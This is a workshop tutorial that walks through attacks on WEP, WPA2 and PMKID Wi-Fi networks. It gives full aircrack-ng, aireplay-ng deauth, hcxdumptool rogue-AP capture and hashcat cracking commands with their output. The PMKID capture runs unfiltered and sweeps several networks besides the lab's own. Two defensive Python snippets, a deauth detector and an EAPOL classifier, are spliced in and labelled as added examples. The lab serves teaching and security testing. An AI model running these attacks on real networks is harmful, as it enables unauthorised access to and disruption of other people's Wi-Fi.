---
tags: 'workshop'
---

Wi-Fi Hacking Lab
===

**Wi-Fi Hacking Lab**, Johnny Pan, 2022-10-08

:::info
This lab was created for educational purposes, to help you assess and improve the security of the following kinds of wireless network:
- Wired Equivalent Privacy (WEP)
- Wi-Fi Protected Access (WPA)
- Wi-Fi Protected Access v2 (WPA2)
:::

:::danger
Only do this on your own wireless network.
:::

[TOC]

## Wireless hacking concepts

- WEP
- WPA
- WPA2
- Monitor Mode
- Promiscuous Mode
- Packet Injection
- 4-way handshake
- [EAPOL](https://vocal.com/secure-communication/eapol-extensible-authentication-protocol-over-lan/)

## Requirements

- Wi-Fi AP/Router
- Wi-Fi Adapter
- Aircrack-ng suite
- Linux OS

## Hacking WEP

### Changing to root user

```bash!
[codeskill@wireless ~]$ sudo su
```

### Identifying the wireless adapter

```bash!
[root@wireless ~]# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
```

### Enabling monitor mode

**Option #1 - Using ifconfig**

```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# ifconfig wlan0 up
```

**Option #2 - Using Airmon-ng**

```bash!
[root@wireless ~]# airmon-ng check wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    494 NetworkManager
   1944 wpa_supplicant
```

```bash!
[root@wireless ~]# airmon-ng check kill

Killing these processes:

    PID Name
   1944 wpa_supplicant
```

```bash!
[root@wireless ~]# airmon-ng start wlan0

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
```

```bash!
[root@wireless ~]# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
```

### Changing MAC address

```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# macchanger -r wlan0
[root@wireless ~]# ifconfig wlan0 up
```

### Selecting WEP encrypted SSID

```bash!
[root@wireless ~]# airodump-ng wlan0mon --encrypt wep

 CH  6 ][ Elapsed: 48 s ][ 2022-10-09 23:59

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:18:39:E4:61:28  -40       26        0    0  11   54e  WEP  WEP          OPENSOURCE
```

### Packet injection

```bash!
[root@wireless ~]# besside-ng wlan0mon -c 6 -b 00:18:39:E4:61:28
[00:21:02] Let's ride
[00:21:02] Resuming from besside.log
[00:21:02] Appending to wpa.cap
[00:21:02] Appending to wep.cap
[00:21:02] Logging to besside.log
[00:21:02] | Scanning chan 06
[00:21:02] / Scanning chan 06
[00:21:02] / Attacking [OPENSOURCE] WEP - PING
[00:21:02] - Attacking [OPENSOURCE] WEP - PING
...
[00:21:03] Associated to OPENSOURCE AID [1]
[00:21:03] - Attacking [OPENSOURCE] WEP - GET REPLAY
[00:21:03] | Attacking [OPENSOURCE] WEP - GET REPLAY
[00:21:03] / Attacking [OPENSOURCE] WEP - GET REPLAY
...
[00:21:42] \ Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
[00:21:42] | Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
[00:21:42] / Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
...
[00:23:18] - Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
[00:23:18] \ Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
[00:23:18] | Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
...
[00:42:56] | Attacking [OPENSOURCE] WEP - FLOOD - 44989 IVs rate 94 [193 PPS out] len 64
[00:42:56] \ Attacking [OPENSOURCE] WEP - FLOOD - 44999 IVs rate 94 [193 PPS out] len 64
[00:42:56] / Attacking [OPENSOURCE] WEP - FLOOD cracking - 45005 IVs rate 94 [193 PPS out] len 64
[00:42:56] Got key for OPENSOURCE [bf:53:9e:db:37] 45008 IVs
[00:42:56] Pwned network OPENSOURCE in 8:58 mins:sec
[00:42:56] TO-OWN [] OWNED [OPENSOURCE]
[00:42:56] All neighbors owned
```

### Cracking wep.cap file

```bash
[root@wireless ~]# aircrack-ng ./wep.cap

                                 Aircrack-ng 1.7

                   [00:00:01] Tested 67097 keys (got 45009 IVs)

   KB    depth   byte(vote)
    0    0/  1   BF(66560) D6(54272) 70(53504) 71(52480) 06(51968) 92(51968) C3(51200) 14(50944) 25(50944) 33(50688) EA(50688) 66(50432) 72(50176) C4(50176) 10(49920)
    1    0/ 35   53(60160) 7E(53504) EE(53504) 0D(53248) 7F(52992) E2(52736) B9(52480) F0(52224) 03(51456) 18(51456) 8D(50944) F1(50944) D5(50688) 94(50432) BC(50432)
    2    0/  3   9E(65792) 52(57088) 95(54528) C3(53248) B8(52992) 41(52480) 03(51712) CB(51712) CE(51712) 9F(51200) 0B(50944) 14(50944) 4B(50944) BE(50944) BA(50688)
    3    0/  3   DB(65024) 23(57088) A6(54272) 62(52992) 3B(51968) 43(51712) 60(51712) AB(51712) B1(51712) 85(51456) B6(51456) BC(51200) CD(51200) 09(50944) C7(50944)
    4  206/214   AC(41984) 44(41728) 47(41728) 52(41728) 8F(41728) 95(41728) B5(41728) C2(41728) CD(41728) ED(41728) 45(41472) 88(41472) B0(41472) DD(41472) FD(41472)

             KEY FOUND! [ BF:53:9E:DB:37 ]
        Decrypted correctly: 100%
```

## Hacking WPA/WPA2

### Changing to root user

```bash!
[codeskill@wireless ~]$ sudo su
```

### Identifying the wireless adapter

```bash!
[root@wireless ~]# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
```

### Enabling monitor mode

**Option #1 - Using ifconfig**

```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# ifconfig wlan0 up
```

**Option #2 - Using Airmon-ng**

```bash!
[root@wireless ~]# airmon-ng check wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    494 NetworkManager
   1944 wpa_supplicant
```

```bash!
[root@wireless ~]# airmon-ng check kill

Killing these processes:

    PID Name
   1944 wpa_supplicant
```

```bash!
[root@wireless ~]# airmon-ng start wlan0

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
```

```bash!
[root@wireless ~]# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
```

### Changing MAC address

```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# macchanger -r wlan0
[root@wireless ~]# ifconfig wlan0 up
```

### Selecting WPA/WPA2 encrypted SSID

```bash
[root@wireless ~]# airodump-ng wlan0mon

 CH 13 ][ Elapsed: 1 min ][ 2022-10-10 23:03

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:18:39:E4:61:28  -50       41        6    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE
 BE:A7:B9:14:DB:98  -57       40        0    0   6  130   WPA2 CCMP   PSK  ARTEMIS
 BA:A7:B9:14:DB:98  -54       41        0    0   6  130   WPA2 CCMP   PSK  NARUTO
 B6:A7:B9:14:DB:98  -57       42        0    0   6  130   WPA2 CCMP   PSK  TOTORO
 B0:A7:B9:14:DB:98  -57       39        0    0   6  130   WPA2 CCMP   PSK  YOSHI
 62:AF:97:C2:4E:24  -33       37        0    0   6  130   WPA2 CCMP   PSK  ARTEMIS
 5E:AF:97:C2:4E:24  -33       40        0    0   6  130   WPA2 CCMP   PSK  NARUTO
 5A:AF:97:C2:4E:24  -34       41        0    0   6  130   WPA2 CCMP   PSK  TOTORO
 54:AF:97:C2:4E:24  -33       42        0    0   6  130   WPA2 CCMP   PSK  YOSHI

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:18:39:E4:61:28  16:41:DA:4E:36:EA  -31    0 - 1e     0       23
```

### Monitor the network for a handshake

We press **`Ctrl+C`** and review the list of SSIDs. We look for the one we are interested in auditing. In this case we are going to work with ==OPENSOURCE==.

A `handshake` occurs when a device connects to a network (e.g., when your computer connects to a router). You need to wait until a handshake occurs so you capture the data necessary to crack the password.

To start monitoring, run the following command:

**airodump-ng --channel ==<CHANNEL>== --bssid ==<MAC-AP>== -w ==<CAPTURE-FILE>== wlan0mon**

In our case the values are the following:

- **CHANNEL** = 6
- **MAC-AP** = 00:18:39:E4:61:28
- **CAPTURE-FILE** = wpa2

As long as this command stays running, you'll be monitoring for all connections and new handshakes.
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon

 CH  6 ][ Elapsed: 0 s ][ 2022-10-10 23:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:18:39:E4:61:28  -51 100       43        1    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
```

### Deauth attack

A deauth attack sends deauthentication packets to the router you're trying to break into, causing users to disconnect and requiring them to log back in. When a user logs back in, you will be provided with a handshake. If you don't do a deauth attack, you might have to wait a long time for a handshake to complete, and you need that handshake to crack the password.

If you already see a line with the tag "WPA handshake:" followed by a MAC address in the output of the airodump-ng command, skip this step because you have what you need to crack the password and don't need to send deauth packets.

```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon

 CH  6 ][ Elapsed: 1 min ][ 2022-10-10 30:24 ][ WPA handshake: 00:18:39:E4:61:28

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:18:39:E4:61:28  -48 100      690       31    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
```

Wait for something to connect to the network. Once you see two **BSSID** addresses appear next to each other, one labeled BSSID (the Wi-Fi router) and the other labeled STATION (the computer or other device), this means a client is connected. To force them into a handshake, you'll now send them deauth packets that kill their connection.
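The detection side of the deauth attack just described, as an added example that is not part of the original lab: a sliding-window counter over parsed 802.11 management frames that flags an (AP, station) pair receiving a burst of deauthentication or disassociation frames. The `Frame` record type is this example's own, not an aircrack-ng format; the sample traffic is constructed, with one ordinary deauth from a departing station (`OTHER`, a made-up address) and a burst modelled on the lab's aireplay-ng output (64 directed deauth frames, reason code 7).

```python
"""Deauthentication-flood detector over parsed 802.11 management frames."""
from collections import defaultdict, deque
from dataclasses import dataclass

# IEEE 802.11 management frame subtypes (frame type 0)
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12

AP = "00:18:39:e4:61:28"      # the lab's access point
STA = "16:41:da:4e:36:ea"     # the lab's client station
OTHER = "aa:bb:cc:00:11:22"   # constructed: a station that leaves normally


@dataclass(frozen=True)
class Frame:
    ts: float        # seconds since start of capture
    subtype: int     # management subtype
    src: str         # transmitter address
    dst: str         # receiver address
    reason: int = 0  # reason code for deauth / disassoc frames


def detect_deauth_floods(frames, window=2.0, threshold=10):
    """Flag address pairs that see >= threshold deauth/disassoc frames inside
    any sliding window of `window` seconds.

    Pairs are unordered, so frames spoofed in both directions (AP -> STA and
    STA -> AP, as injection tools send them) count toward one conversation.
    """
    recent = defaultdict(deque)   # pair -> timestamps inside the window
    alerts = {}                   # pair -> alert record
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        pair = tuple(sorted((f.src.lower(), f.dst.lower())))
        q = recent[pair]
        q.append(f.ts)
        while f.ts - q[0] > window:
            q.popleft()
        if len(q) < threshold:
            continue
        if pair not in alerts:
            alerts[pair] = {"pair": pair, "first_ts": q[0], "last_ts": f.ts,
                            "count": len(q), "reasons": {f.reason}}
        else:
            a = alerts[pair]
            a["last_ts"] = f.ts
            a["count"] += 1
            a["reasons"].add(f.reason)
    return list(alerts.values())


def build_sample_frames():
    """Constructed capture: beacons, one normal deauth, then the flood."""
    frames = [Frame(float(i), SUBTYPE_BEACON, AP, "ff:ff:ff:ff:ff:ff") for i in range(12)]
    # reason 3: "sending STA is leaving the ESS", a single legitimate frame
    frames.append(Frame(0.5, SUBTYPE_DEAUTH, OTHER, AP, reason=3))
    # 64 directed deauth frames with reason 7 inside one second, alternating direction
    for i in range(64):
        src, dst = (AP, STA) if i % 2 == 0 else (STA, AP)
        frames.append(Frame(10.0 + i * 0.015, SUBTYPE_DEAUTH, src, dst, reason=7))
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_floods(build_sample_frames()):
        print(f"deauth flood between {alert['pair'][0]} and {alert['pair'][1]}: "
              f"{alert['count']} frames in {alert['last_ts'] - alert['first_ts']:.2f}s, "
              f"reason codes {sorted(alert['reasons'])}")
```

The single reason-3 deauth never reaches the threshold, while the burst is reported once with its total frame count. A detector like this only observes the problem; the fix on the access point side is Protected Management Frames (IEEE 802.11w), which MIC-protects deauthentication and disassociation frames so that spoofed ones are dropped, and which WPA3 requires.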
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon

 CH  6 ][ Elapsed: 6 s ][ 2022-10-10 23:38 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:18:39:E4:61:28  -45 100       68       28    6   6   54e  WPA2 CCMP   PSK  OPENSOURCE

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:18:39:E4:61:28  16:41:DA:4E:36:EA  -43   1e- 1e    177      129  EAPOL  OPENSOURCE
```

Open a new terminal. Make sure airodump-ng is still running in the original terminal window, and drag it to another place on your desktop so both terminals are visible.

Send the deauth packets. Run this command, replacing NETWORK BSSID with the router's BSSID and STATION BSSID with the BSSID of the client that connected to the network: `aireplay-ng -0 2 -a NETWORK BSSID -c STATION BSSID wlan0mon`. This command will send 2 deauth packets to disconnect the client from the network. Don't try to send more than this; sending too many packets could prevent the client from reconnecting and generating the handshake.

As long as you're close enough to the target client, they'll be disconnected from the router and forced to reconnect with a handshake. If this doesn't work, move closer to the client. As soon as the client reconnects, all of the information you'll need to crack the password will be available.

```bash
[root@wireless ~]# aireplay-ng -0 2 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon
23:47:41  Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6
23:47:41  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|53 ACKs]
23:47:42  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|57 ACKs]
```

### Cracking wpa2.cap file

When you see ==WPA handshake: <AP MAC ADDRESS>==, you can crack the password.
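What the "WPA handshake:" tag means in protocol terms, as an added example that is not code from the original lab: airodump-ng sets it once it has seen the EAPOL-Key messages of one 4-way handshake, and each message is recognised from the Key Information bits of the EAPOL-Key descriptor (Key Ack, Key MIC, Install, Secure). The classifier below parses those fields and reports whether a set of frames forms a complete handshake, using the rule that M2 echoes M1's replay counter and M4 echoes M3's. The four frames are constructed minimal EAPOL-Key bodies (nonces and MIC zeroed), not packets from a real capture; `make_eapol_key` is this example's own helper.

```python
"""Classify WPA2 4-way handshake messages from EAPOL-Key Key Information bits."""
import struct

# Key Information bit flags (IEEE 802.11-2016, 12.7.2 EAPOL-Key frames)
KI_PAIRWISE = 1 << 3
KI_INSTALL = 1 << 6
KI_ACK = 1 << 7
KI_MIC = 1 << 8
KI_SECURE = 1 << 9
KI_ENCRYPTED = 1 << 12   # set on M3, whose key data carries the GTK

EAPOL_KEY_TYPE = 3       # 802.1X packet type for EAPOL-Key
RSN_DESCRIPTOR = 2       # key descriptor type used by WPA2


def handshake_message(key_info):
    """Return 1..4 for a pairwise 4-way handshake message, else None."""
    if not key_info & KI_PAIRWISE:
        return None      # group key handshake, not part of the 4-way exchange
    ack = bool(key_info & KI_ACK)
    mic = bool(key_info & KI_MIC)
    install = bool(key_info & KI_INSTALL)
    secure = bool(key_info & KI_SECURE)
    if ack and not mic:
        return 1         # AP -> STA: ANonce, no MIC yet
    if mic and not ack and not secure:
        return 2         # STA -> AP: SNonce, first MIC
    if ack and mic and install:
        return 3         # AP -> STA: install PTK, encrypted GTK
    if mic and not ack and secure:
        return 4         # STA -> AP: confirmation
    return None


def parse_eapol_key(frame):
    """Parse the 802.1X header and the fixed EAPOL-Key descriptor fields."""
    version, ptype, length = struct.unpack_from("!BBH", frame, 0)
    if ptype != EAPOL_KEY_TYPE:
        raise ValueError("not an EAPOL-Key frame")
    desc_type, key_info, key_len, replay = struct.unpack_from("!BHHQ", frame, 4)
    return {
        "descriptor": desc_type,
        "key_info": key_info,
        "replay_counter": replay,
        "nonce": frame[17:49],
        "message": handshake_message(key_info),
    }


def handshake_status(frames):
    """Which messages are present, and do they form one complete handshake?"""
    by_msg = {}
    for frame in frames:
        parsed = parse_eapol_key(frame)
        if parsed["message"] is not None:
            by_msg.setdefault(parsed["message"], parsed)
    complete = (
        all(m in by_msg for m in (1, 2, 3, 4))
        and by_msg[1]["replay_counter"] == by_msg[2]["replay_counter"]
        and by_msg[3]["replay_counter"] == by_msg[4]["replay_counter"]
    )
    return {"messages": sorted(by_msg), "complete": complete}


def make_eapol_key(key_info, replay_counter, nonce=b"\x00" * 32):
    """Construct a minimal EAPOL-Key frame (95-byte descriptor, empty key data)."""
    descriptor = struct.pack("!BHHQ", RSN_DESCRIPTOR, key_info, 16, replay_counter)
    descriptor += nonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, reserved
    descriptor += b"\x00" * 16 + struct.pack("!H", 0)                 # MIC, key data length
    return struct.pack("!BBH", 2, EAPOL_KEY_TYPE, len(descriptor)) + descriptor


# Constructed handshake: Key Information values as seen on the wire for
# WPA2-CCMP (descriptor version 2), replay counters 1, 1, 2, 2.
SAMPLE_HANDSHAKE = [
    make_eapol_key(0x008A, 1),   # M1
    make_eapol_key(0x010A, 1),   # M2
    make_eapol_key(0x13CA, 2),   # M3
    make_eapol_key(0x030A, 2),   # M4
]

if __name__ == "__main__":
    print(handshake_status(SAMPLE_HANDSHAKE))
```

The same classification is what the `EAPOL M1..M4 messages` and `EAPOL pairs ... (RC checked)` counters in the hcxpcapngtool summary later on this page are built from; a wireless IDS correlates a deauth burst followed by a fresh M1/M2 pair for the same station as a forced re-authentication.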
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon

 CH  6 ][ Elapsed: 5 mins ][ 2022-10-10 23:52 ][ WPA handshake: 00:18:39:E4:61:28

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:18:39:E4:61:28  -49 100     3257       26    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
```

In the original terminal window, press Control+C to quit airodump-ng. This stops the dump and saves a file ending with .cap to your desktop.

Decompress the rockyou.txt wordlist. To crack the password, you'll need a wordlist. Fortunately, since you're using Kali Linux, you have several already in /usr/share/wordlists. The one we'll want to use is called rockyou.txt, but it's zipped up by default. To unzip it, run `gzip -d /usr/share/wordlists/rockyou.txt.gz`. You won't be able to crack the password if it's not in the wordlist. You can always try one of the other wordlists if rockyou.txt doesn't crack the password.

```bash
apt install wordlists
gzip -d /usr/share/wordlists/rockyou.txt.gz
```

Run the command to crack the password. You'll use a tool called aircrack-ng, which comes with Kali Linux, to do so. The command is `aircrack-ng -a2 -b NETWORK BSSID -w /usr/share/wordlists/rockyou.txt /root/Desktop/*.cap`. Replace NETWORK BSSID with the BSSID for the router. Depending on the strength of the password and the speed of your CPU, this process can take anywhere from a few hours to a few days. If you're cracking a static WEP key network instead of a WPA/WPA2-PSK network, replace -a2 with -a1.

```bash
[root@wireless ~]# aircrack-ng -a2 -b 00:18:39:E4:61:28 -w /usr/share/wordlists/rockyou.txt ./wpa2-01.cap

                               Aircrack-ng 1.7

      [00:00:00] 2171/10303727 keys tested (5462.94 k/s)

      Time left: 31 minutes, 25 seconds                          0.02%

                           KEY FOUND! [ qwerty123 ]


      Master Key     : 2C 08 85 AD 79 69 79 A6 8E 1D A2 C3 87 5A 2F 16
                       92 5F F4 87 E0 57 41 9C 27 CC AB 24 F2 29 49 4E

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      EAPOL HMAC     : DF BB 43 33 70 11 D9 CB D3 F6 12 FF 42 BE CB 9A
```

## Hacking PMKID

### Installing the needed tools

```bash!
[root@wireless ~]# apt install hcxdumptool
[root@wireless ~]# apt install hcxtools
```

### Capturing PMKID packets

```bash
[root@wireless ~]# hcxdumptool -i wlan0 -o test.pcapng --enable_status=1
initialization of hcxdumptool 6.2.6 (depending on the capabilities of the device, this may take some time)...
interface is already in monitor mode, skipping ioctl(SIOCSIWMODE) and ioctl(SIOCSIFFLAGS) system calls
start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
PHYSICAL INTERFACE........: phy3
INTERFACE NAME............: wlan0
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 20 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 00c0cab1a5fc (not used for the attack)
INTERFACE VIRTUAL MAC.....: 00c0cab1a5fc (not used for the attack)
DRIVER....................: mt76x2u
DRIVER VERSION............: 5.18.0-kali7-amd64
DRIVER FIRMWARE VERSION...: 0.0.00-b1
openSSL version...........: 1.0
ERRORMAX..................: 100 errors
BPF code blocks...........: 0
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: a468bcb13022 (BROADCAST WILDCARD used for the attack)
ACCESS POINT (ROGUE)......: a468bcb13023 (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: a468bcb13024 (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: d85dfb0ab897
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 63589
ANONCE....................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146
SNONCE....................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7

TIME     FREQ/CH  MAC_DEST      MAC_SOURCE    ESSID    [FRAME TYPE]
01:11:31 2442/7   6872c30f193c  54af97c24e24  YOSHI    [EAPOL:M1M2ROGUE EAPOLTIME:4232 RC:63589 KDV:2]
01:11:47 2462/11  6872c30f193c  a468bcb13027  YOSHI    [EAPOL:M1M2ROGUE EAPOLTIME:6305 RC:63589 KDV:2]
01:13:50 2412/1   a86daa1620a1  a468bcb1302c  SAITAMA  [EAPOL:M1M2ROGUE EAPOLTIME:4445 RC:63589 KDV:2]
01:13:54 2417/2   94e6f78fdb99  a468bcb1302d  ARTEMIS  [EAPOL:M1M2ROGUE EAPOLTIME:1563 RC:63589 KDV:2]
01:13:56 2422/3   6872c30f193c  a468bcb13027  YOSHI    [EAPOL:M1M2ROGUE EAPOLTIME:840 RC:63589 KDV:2]
01:14:00 2427/4   6872c30f193c  a468bcb13027  YOSHI    [EAPOL:M1M2ROGUE EAPOLTIME:4187 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1  a468bcb1302c  SAITAMA  [EAPOL:M1M2ROGUE EAPOLTIME:3132 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1  a468bcb1302c  SAITAMA  [EAPOL:M1M2ROGUE EAPOLTIME:1575 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1  a468bcb1302c  SAITAMA  [EAPOL:M1M2ROGUE EAPOLTIME:2548 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1  a468bcb1302c  SAITAMA  [EAPOL:M1M2ROGUE EAPOLTIME:5387 RC:63589 KDV:2]
01:14:08 2437/6   94e6f78fdb99  a468bcb1302d  ARTEMIS  [EAPOL:M1M2ROGUE EAPOLTIME:1818 RC:63589 KDV:2]
01:14:17 2447/8   a86daa1620a1  a468bcb1302c  SAITAMA  [EAPOL:M1M2ROGUE EAPOLTIME:3958 RC:63589 KDV:2]
01:16:17 5805/161 a86daa1620a1  54af97c24e25  SAITAMA  [EAPOL:M1M2ROGUE EAPOLTIME:4022 RC:63589 KDV:2]
01:16:19 5805/161 1c4d660367fb  6aaf97c24e25  ARTEMIS  [EAPOL:M1M2ROGUE EAPOLTIME:2319 RC:63589 KDV:2]
```

### Converting PCAP file to Hashcat file

```bash
[root@wireless ~]# hcxpcapngtool -E essidlist -I identitylist -U usernamelist -o test.22000 test.pcapng
hcxpcapngtool 6.2.7 reading from test.pcapng...
summary capture file
--------------------
file name................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 5.18.0-kali7-amd64
application..............................: hcxdumptool 6.2.6
interface name...........................: wlan0
interface vendor.........................: 00c0ca
openSSL version..........................: 1.0
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: a468bcb13024 (incremented on every new client)
MAC CLIENT...............................: d85dfb0ab897
REPLAYCOUNT..............................: 63589
ANONCE...................................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146
SNONCE...................................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7
timestamp minimum (GMT)..................: 14.10.2022 01:11:07
timestamp maximum (GMT)..................: 14.10.2022 01:23:11
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 3780
packets received on 2.4 GHz..............: 1637
packets received on 5 GHz................: 1754
ESSID (total unique).....................: 67
BEACON (total)...........................: 79
BEACON on 2.4 GHz channel (from IE_TAG)..: 1 2 3 4 5 6 8 9 10 11
BEACON on 5/6 GHz channel (from IE-TAG)..: 36 40 44 48 149 161
BEACON (SSID wildcard/unset).............: 4
BEACON (SSID zeroed).....................: 2
ACTION (total)...........................: 33
ACTION (containing ESSID)................: 31
PROBEREQUEST.............................: 17
PROBEREQUEST (directed)..................: 2
PROBERESPONSE (total)....................: 59
AUTHENTICATION (total)...................: 75
AUTHENTICATION (OPEN SYSTEM).............: 75
ASSOCIATIONREQUEST (total)...............: 19
ASSOCIATIONREQUEST (PSK).................: 17
REASSOCIATIONREQUEST (total).............: 2
REASSOCIATIONREQUEST (PSK)...............: 2
EAPOL messages (total)...................: 3435
EAPOL RSN messages.......................: 3435
EAPOLTIME gap (measured maximum usec)....: 1479862
EAPOL ANONCE error corrections (NC)......: working
REPLAYCOUNT gap (suggested NC)...........: 2
EAPOL M1 messages (total)................: 2581
EAPOL M2 messages (total)................: 810
EAPOL M3 messages (total)................: 22
EAPOL M4 messages (total)................: 22
EAPOL pairs (total)......................: 8526
EAPOL pairs (best).......................: 17
EAPOL ROGUE pairs........................: 11
EAPOL pairs written to 22000 hash file...: 17 (RC checked)
EAPOL M12E2 (challenge)..................: 12
EAPOL M32E2 (authorized).................: 5
PMKID (useless)..........................: 40
PMKID (total)............................: 160
PMKID (best).............................: 6
PMKID ROGUE..............................: 5
PMKID written to 22000 hash file.........: 6
malformed packets (total)................: 3
BEACON error (total malformed packets)...: 3

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2412: 275      2417: 180      2422: 55       2427: 181      2432: 92       2437: 100
 2442: 11       2447: 92       2452: 302      2457: 76       2462: 224      2467: 48
 2472: 1        5180: 1220     5200: 3        5220: 164      5240: 139      5745: 1
 5765: 71       5785: 59       5805: 95       5825: 2

session summary
---------------
processed pcapng files................: 1
```

### Cracking PMKID

```bash=
hashcat -m 22000 test.22000 -a 0 --kernel-accel=1 -w 4 --force '/usr/share/wordlists/rockyou.txt'

Session..........: hashcat
Status...........: Running
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.22000
Time.Started.....: Fri Oct 14 01:36:27 2022, (5 mins, 54 secs)
Time.Estimated...: Tue Oct 18 11:29:14 2022, (4 days, 9 hours)
Kernel.Feature...: Pure Kernel
